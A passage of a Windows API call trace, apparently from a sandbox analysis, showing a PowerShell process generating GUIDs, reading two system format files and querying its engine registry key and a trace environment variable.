	[0445.894] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x181e95f, Data2=0xf9be, Data3=0x43ab, Data4=([0]=0xa2, [1]=0xff, [2]=0x20, [3]=0x7c, [4]=0x8a, [5]=0x48, [6]=0xea, [7]=0x30))) returned 0x0
	[0445.894] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x291038ac, Data2=0x4e2c, Data3=0x4d63, Data4=([0]=0x9f, [1]=0x34, [2]=0x56, [3]=0x32, [4]=0x95, [5]=0x49, [6]=0xb, [7]=0xb7))) returned 0x0
	[0445.895] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x899da366, Data2=0xff52, Data3=0x4d37, Data4=([0]=0xb7, [1]=0xea, [2]=0x7d, [3]=0xba, [4]=0xc5, [5]=0x29, [6]=0xc2, [7]=0x2c))) returned 0x0
	[0445.896] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x8b94c52b, Data2=0x14f0, Data3=0x45fc, Data4=([0]=0x98, [1]=0x1b, [2]=0xb5, [3]=0xe5, [4]=0x34, [5]=0xae, [6]=0x4f, [7]=0xfb))) returned 0x0
	[0445.896] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x3fe1834f, Data2=0x9497, Data3=0x4c67, Data4=([0]=0x86, [1]=0x43, [2]=0x33, [3]=0xc, [4]=0x72, [5]=0xf7, [6]=0x38, [7]=0xa8))) returned 0x0
	[0445.897] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x414ef334, Data2=0x68f6, Data3=0x4867, Data4=([0]=0x94, [1]=0x8f, [2]=0xde, [3]=0x36, [4]=0x60, [5]=0x64, [6]=0xec, [7]=0x2f))) returned 0x0
	[0445.897] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x1fdb3b9d, Data2=0xae7e, Data3=0x4df8, Data4=([0]=0x88, [1]=0x5a, [2]=0x97, [3]=0xfa, [4]=0xae, [5]=0x13, [6]=0x37, [7]=0x93))) returned 0x0
	[0445.898] VirtualQuery (in: lpAddress=0x12bf40, lpBuffer=0x12ce00, dwLength=0x30 | out: lpBuffer=0x12ce00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0445.899] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xa6c2ad55, Data2=0xbe72, Data3=0x4c76, Data4=([0]=0x87, [1]=0x6b, [2]=0xb9, [3]=0xb1, [4]=0xa0, [5]=0x46, [6]=0xc2, [7]=0xaa))) returned 0x0
	[0445.900] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xf23a19ba, Data2=0x3f3c, Data3=0x4790, Data4=([0]=0x8f, [1]=0x52, [2]=0x2e, [3]=0xe5, [4]=0x3c, [5]=0xef, [6]=0x1b, [7]=0x3a))) returned 0x0
	[0445.900] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x669f7c7a, Data2=0x54c8, Data3=0x48ad, Data4=([0]=0xaa, [1]=0x77, [2]=0xa8, [3]=0xa0, [4]=0xfd, [5]=0x8a, [6]=0x51, [7]=0x1e))) returned 0x0
	[0445.901] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x4c60c589, Data2=0x9f07, Data3=0x4833, Data4=([0]=0x95, [1]=0xa3, [2]=0x27, [3]=0xeb, [4]=0xa2, [5]=0x46, [6]=0x9b, [7]=0x37))) returned 0x0
	[0445.902] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x7089c071, Data2=0x46ce, Data3=0x4570, Data4=([0]=0xae, [1]=0x7d, [2]=0xad, [3]=0xd4, [4]=0x9e, [5]=0xd6, [6]=0x8f, [7]=0x2b))) returned 0x0
	[0445.902] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x9f20108f, Data2=0x5418, Data3=0x4e03, Data4=([0]=0xb3, [1]=0x91, [2]=0x2b, [3]=0xa, [4]=0xc7, [5]=0x49, [6]=0x80, [7]=0x4c))) returned 0x0
	[0445.902] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xd365afbb, Data2=0xebfd, Data3=0x473c, Data4=([0]=0xb2, [1]=0x9d, [2]=0x15, [3]=0xd3, [4]=0x6, [5]=0x6e, [6]=0xe5, [7]=0x7d))) returned 0x0
	[0445.902] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xc7787dbc, Data2=0x89d, Data3=0x4844, Data4=([0]=0xae, [1]=0xc2, [2]=0x9e, [3]=0xc0, [4]=0xb4, [5]=0xe9, [6]=0xc5, [7]=0xd0))) returned 0x0
	[0445.902] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x5539259c, Data2=0x8f7c, Data3=0x4f5d, Data4=([0]=0x97, [1]=0x2f, [2]=0x88, [3]=0x3f, [4]=0x2c, [5]=0x68, [6]=0xcf, [7]=0x5))) returned 0x0
	[0445.902] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xe47469e0, Data2=0x9a90, Data3=0x41e8, Data4=([0]=0x86, [1]=0x3c, [2]=0x26, [3]=0x49, [4]=0xa, [5]=0xd9, [6]=0xe7, [7]=0xd0))) returned 0x0
	[0445.902] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xea4d850e, Data2=0x5d8b, Data3=0x4aca, Data4=([0]=0xb5, [1]=0xd4, [2]=0x98, [3]=0x70, [4]=0xe0, [5]=0x5d, [6]=0x2b, [7]=0x34))) returned 0x0
	[0445.902] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x1d235c64, Data2=0x919f, Data3=0x4034, Data4=([0]=0x9b, [1]=0xd0, [2]=0x9a, [3]=0x5f, [4]=0x17, [5]=0xdf, [6]=0xc4, [7]=0x67))) returned 0x0
	[0445.903] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xc3457a6a, Data2=0xc276, Data3=0x4437, Data4=([0]=0x92, [1]=0x5f, [2]=0xd5, [3]=0x62, [4]=0xf6, [5]=0x4e, [6]=0xcb, [7]=0xc2))) returned 0x0
	[0445.903] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x9a105bf6, Data2=0x555e, Data3=0x481f, Data4=([0]=0xaf, [1]=0x9, [2]=0xda, [3]=0x3, [4]=0x12, [5]=0x18, [6]=0xf6, [7]=0xd5))) returned 0x0
	[0445.903] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x60845238, Data2=0x83c, Data3=0x4388, Data4=([0]=0xa7, [1]=0xb4, [2]=0x65, [3]=0xb3, [4]=0x6c, [5]=0xa8, [6]=0xfc, [7]=0x8c))) returned 0x0
	[0445.903] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x1ccb3731, Data2=0x2c4b, Data3=0x4ec2, Data4=([0]=0x89, [1]=0x11, [2]=0xe2, [3]=0xdc, [4]=0xc0, [5]=0xa1, [6]=0xb8, [7]=0x51))) returned 0x0
	[0445.903] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x6f26ca95, Data2=0xee80, Data3=0x43ed, Data4=([0]=0x97, [1]=0x9d, [2]=0x4, [3]=0x27, [4]=0x78, [5]=0x44, [6]=0xa9, [7]=0xd6))) returned 0x0
	[0445.903] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xe2a6c58e, Data2=0xe66b, Data3=0x487f, Data4=([0]=0x88, [1]=0xd1, [2]=0x5f, [3]=0x2b, [4]=0xd5, [5]=0x4b, [6]=0x9d, [7]=0xc1))) returned 0x0
	[0445.904] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x1327fad1, Data2=0x4e9e, Data3=0x4623, Data4=([0]=0x80, [1]=0x22, [2]=0x44, [3]=0x4a, [4]=0x25, [5]=0x2a, [6]=0x46, [7]=0x5f))) returned 0x0
	[0445.904] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x9660e53c, Data2=0xb27c, Data3=0x481d, Data4=([0]=0x90, [1]=0xc8, [2]=0x93, [3]=0x4c, [4]=0x98, [5]=0x36, [6]=0x78, [7]=0xd))) returned 0x0
	[0445.904] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x240c9220, Data2=0xd889, Data3=0x426e, Data4=([0]=0xb3, [1]=0x42, [2]=0xb1, [3]=0x9b, [4]=0xc5, [5]=0xba, [6]=0x3, [7]=0xde))) returned 0x0
	[0445.904] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x2f1af5b7, Data2=0xb398, Data3=0x4e9f, Data4=([0]=0x99, [1]=0x11, [2]=0xae, [3]=0x4b, [4]=0x57, [5]=0xa6, [6]=0xbc, [7]=0xc2))) returned 0x0
	[0445.904] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x8b707e07, Data2=0x9dcb, Data3=0x428b, Data4=([0]=0x8d, [1]=0x58, [2]=0x6c, [3]=0xb0, [4]=0x31, [5]=0x48, [6]=0x36, [7]=0x15))) returned 0x0
	[0445.904] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xbb46c3b4, Data2=0xef4, Data3=0x4949, Data4=([0]=0xaa, [1]=0x22, [2]=0xce, [3]=0x3f, [4]=0xf4, [5]=0x7, [6]=0xa0, [7]=0xec))) returned 0x0
	[0445.904] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x5efbf0d8, Data2=0x3b20, Data3=0x4640, Data4=([0]=0xb2, [1]=0xe9, [2]=0x11, [3]=0xbc, [4]=0x90, [5]=0x1b, [6]=0x52, [7]=0x8a))) returned 0x0
	[0445.905] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x8eec33d5, Data2=0x58fa, Data3=0x4886, Data4=([0]=0xa0, [1]=0xe3, [2]=0x16, [3]=0x5c, [4]=0xc0, [5]=0x86, [6]=0x1, [7]=0xf7))) returned 0x0
	[0445.906] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x8ed0faa4, Data2=0xc5e, Data3=0x446e, Data4=([0]=0x9e, [1]=0x32, [2]=0x74, [3]=0x3f, [4]=0xf, [5]=0x74, [6]=0xad, [7]=0xb7))) returned 0x0
	[0445.907] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x82b25ded, Data2=0x6c91, Data3=0x402c, Data4=([0]=0x81, [1]=0xd9, [2]=0xa0, [3]=0x15, [4]=0x52, [5]=0xfb, [6]=0xc8, [7]=0x97))) returned 0x0
	[0445.907] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x8615626a, Data2=0x65c2, Data3=0x4879, Data4=([0]=0xb3, [1]=0x7c, [2]=0xdc, [3]=0xc2, [4]=0x1b, [5]=0x80, [6]=0x22, [7]=0x7d))) returned 0x0
	[0445.907] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xa3aba0f7, Data2=0x5f5c, Data3=0x429e, Data4=([0]=0xad, [1]=0xfc, [2]=0xbf, [3]=0x48, [4]=0xce, [5]=0xe3, [6]=0xc8, [7]=0xbf))) returned 0x0
	[0445.907] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x5ac420d4, Data2=0x2d75, Data3=0x4b94, Data4=([0]=0xa4, [1]=0x95, [2]=0x29, [3]=0x80, [4]=0xe6, [5]=0x58, [6]=0x1b, [7]=0x4))) returned 0x0
	[0445.907] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x2798aef6, Data2=0x4025, Data3=0x4b80, Data4=([0]=0xb2, [1]=0xc, [2]=0xc2, [3]=0xb5, [4]=0xc1, [5]=0xd, [6]=0x14, [7]=0x12))) returned 0x0
	[0445.907] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x54ac5b02, Data2=0xe008, Data3=0x4ccf, Data4=([0]=0xaa, [1]=0x16, [2]=0x24, [3]=0x27, [4]=0xf5, [5]=0x75, [6]=0x34, [7]=0xd2))) returned 0x0
	[0445.907] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x3df92675, Data2=0x7342, Data3=0x42f7, Data4=([0]=0x92, [1]=0xdb, [2]=0x7, [3]=0x55, [4]=0x5a, [5]=0x95, [6]=0x2b, [7]=0x5))) returned 0x0
	[0445.908] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xa964cad5, Data2=0x2bcd, Data3=0x4ff8, Data4=([0]=0xa9, [1]=0x66, [2]=0xa8, [3]=0xc4, [4]=0xb6, [5]=0xf9, [6]=0x3f, [7]=0xa2))) returned 0x0
	[0445.908] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x548ba2df, Data2=0x8915, Data3=0x4b89, Data4=([0]=0x9f, [1]=0x3e, [2]=0x55, [3]=0xe4, [4]=0x41, [5]=0xc5, [6]=0x6e, [7]=0x8d))) returned 0x0
	[0445.908] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x9a3ed0f3, Data2=0x4095, Data3=0x412a, Data4=([0]=0xb3, [1]=0xb1, [2]=0x71, [3]=0xea, [4]=0x9a, [5]=0xa0, [6]=0x25, [7]=0x9a))) returned 0x0
	[0445.908] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x955ee8b1, Data2=0x44bb, Data3=0x4d55, Data4=([0]=0xab, [1]=0xbe, [2]=0x81, [3]=0x37, [4]=0xc5, [5]=0xf8, [6]=0x1e, [7]=0x54))) returned 0x0
	[0445.908] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xfd681d37, Data2=0x8f23, Data3=0x40ab, Data4=([0]=0xa7, [1]=0xbb, [2]=0x3b, [3]=0xc5, [4]=0x32, [5]=0xa3, [6]=0xc6, [7]=0xed))) returned 0x0
	[0445.908] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x544f72a2, Data2=0x3eda, Data3=0x43a6, Data4=([0]=0xbd, [1]=0xd6, [2]=0x6e, [3]=0x51, [4]=0x95, [5]=0x93, [6]=0xce, [7]=0x3c))) returned 0x0
	[0445.909] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x417c7bf1, Data2=0x51ae, Data3=0x4ae3, Data4=([0]=0x94, [1]=0x65, [2]=0x22, [3]=0xf, [4]=0x1f, [5]=0x6b, [6]=0xf4, [7]=0x2f))) returned 0x0
	[0445.909] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0445.909] GetFileType (hFile=0x2fc) returned 0x1
	[0445.909] SetErrorMode (uMode=0x1) returned 0x1
	[0445.909] GetFileType (hFile=0x2fc) returned 0x1
	[0445.909] ReadFile (in: hFile=0x2fc, lpBuffer=0x3bfb9a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3bfb9a8*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.911] ReadFile (in: hFile=0x2fc, lpBuffer=0x3bfb9a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3bfb9a8*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.911] ReadFile (in: hFile=0x2fc, lpBuffer=0x3bfb9a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3bfb9a8*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.911] ReadFile (in: hFile=0x2fc, lpBuffer=0x3bfb9a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3bfb9a8*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.912] ReadFile (in: hFile=0x2fc, lpBuffer=0x3bfb9a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3bfb9a8*, lpNumberOfBytesRead=0x12d2d8*=0x8b4, lpOverlapped=0x0) returned 1
	[0445.912] ReadFile (in: hFile=0x2fc, lpBuffer=0x3bfadc4, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3bfadc4*, lpNumberOfBytesRead=0x12d2d8*=0x0, lpOverlapped=0x0) returned 1
	[0445.912] ReadFile (in: hFile=0x2fc, lpBuffer=0x3bfb9a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3bfb9a8*, lpNumberOfBytesRead=0x12d2d8*=0x0, lpOverlapped=0x0) returned 1
	[0445.912] CloseHandle (hObject=0x2fc) returned 1
	[0445.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0445.913] SetErrorMode (uMode=0x1) returned 0x1
	[0445.913] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d280 | out: lpFileInformation=0x12d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0445.913] SetErrorMode (uMode=0x1) returned 0x1
	[0445.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0445.913] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d368 | out: phkResult=0x12d368*=0x2fc) returned 0x0
	[0445.913] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d2ec, lpData=0x0, lpcbData=0x12d2e8*=0x0 | out: lpType=0x12d2ec*=0x1, lpData=0x0, lpcbData=0x12d2e8*=0x56) returned 0x0
	[0445.913] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d1ea0
	[0445.915] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d2bc, lpData=0x1b7d1ea0, lpcbData=0x12d2b8*=0x56 | out: lpType=0x12d2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d2b8*=0x56) returned 0x0
	[0445.915] CoTaskMemFree (pv=0x1b7d1ea0) 
	[0445.915] RegCloseKey (hKey=0x2fc) returned 0x0
	[0445.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0445.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0445.916] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xb5822870, Data2=0x6f5d, Data3=0x4673, Data4=([0]=0xac, [1]=0x67, [2]=0xd6, [3]=0x2c, [4]=0xff, [5]=0x5c, [6]=0x25, [7]=0x65))) returned 0x0
	[0445.916] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x3b4fcb00, Data2=0xca2f, Data3=0x405d, Data4=([0]=0xab, [1]=0xa0, [2]=0xf6, [3]=0x8e, [4]=0x3b, [5]=0x3e, [6]=0xc4, [7]=0xb1))) returned 0x0
	[0445.917] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0445.917] GetFileType (hFile=0x2fc) returned 0x1
	[0445.917] SetErrorMode (uMode=0x1) returned 0x1
	[0445.917] GetFileType (hFile=0x2fc) returned 0x1
	[0445.917] ReadFile (in: hFile=0x2fc, lpBuffer=0x3c39790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3c39790*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.918] ReadFile (in: hFile=0x2fc, lpBuffer=0x3c39790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3c39790*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.919] ReadFile (in: hFile=0x2fc, lpBuffer=0x3c39790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3c39790*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.919] ReadFile (in: hFile=0x2fc, lpBuffer=0x3c39790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3c39790*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.919] ReadFile (in: hFile=0x2fc, lpBuffer=0x3c39790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3c39790*, lpNumberOfBytesRead=0x12d2d8*=0xe98, lpOverlapped=0x0) returned 1
	[0445.920] ReadFile (in: hFile=0x2fc, lpBuffer=0x3c38d90, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3c38d90*, lpNumberOfBytesRead=0x12d2d8*=0x0, lpOverlapped=0x0) returned 1
	[0445.920] ReadFile (in: hFile=0x2fc, lpBuffer=0x3c39790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3c39790*, lpNumberOfBytesRead=0x12d2d8*=0x0, lpOverlapped=0x0) returned 1
	[0445.920] CloseHandle (hObject=0x2fc) returned 1
	[0445.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0445.920] SetErrorMode (uMode=0x1) returned 0x1
	[0445.920] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d280 | out: lpFileInformation=0x12d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0445.920] SetErrorMode (uMode=0x1) returned 0x1
	[0445.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0445.921] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d368 | out: phkResult=0x12d368*=0x2fc) returned 0x0
	[0445.921] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d2ec, lpData=0x0, lpcbData=0x12d2e8*=0x0 | out: lpType=0x12d2ec*=0x1, lpData=0x0, lpcbData=0x12d2e8*=0x56) returned 0x0
	[0445.921] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d1ea0
	[0445.921] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d2bc, lpData=0x1b7d1ea0, lpcbData=0x12d2b8*=0x56 | out: lpType=0x12d2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d2b8*=0x56) returned 0x0
	[0445.921] CoTaskMemFree (pv=0x1b7d1ea0) 
	[0445.921] RegCloseKey (hKey=0x2fc) returned 0x0
	[0445.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0445.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0445.923] VirtualQuery (in: lpAddress=0x12be00, lpBuffer=0x12ccc0, dwLength=0x30 | out: lpBuffer=0x12ccc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0445.924] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x28d9cb4a, Data2=0x47bf, Data3=0x4996, Data4=([0]=0xa3, [1]=0x3b, [2]=0x75, [3]=0xa, [4]=0x99, [5]=0x93, [6]=0x3b, [7]=0x46))) returned 0x0
	[0445.924] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x241c97cd, Data2=0x20e, Data3=0x4348, Data4=([0]=0x94, [1]=0xc7, [2]=0xf, [3]=0x62, [4]=0x4f, [5]=0x28, [6]=0x79, [7]=0xbf))) returned 0x0
	[0446.037] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0446.037] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.037] CoTaskMemFree (pv=0x2eadc0) 
	[0446.041] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0446.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.041] CoTaskMemFree (pv=0x2eadc0) 
	[0446.042] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
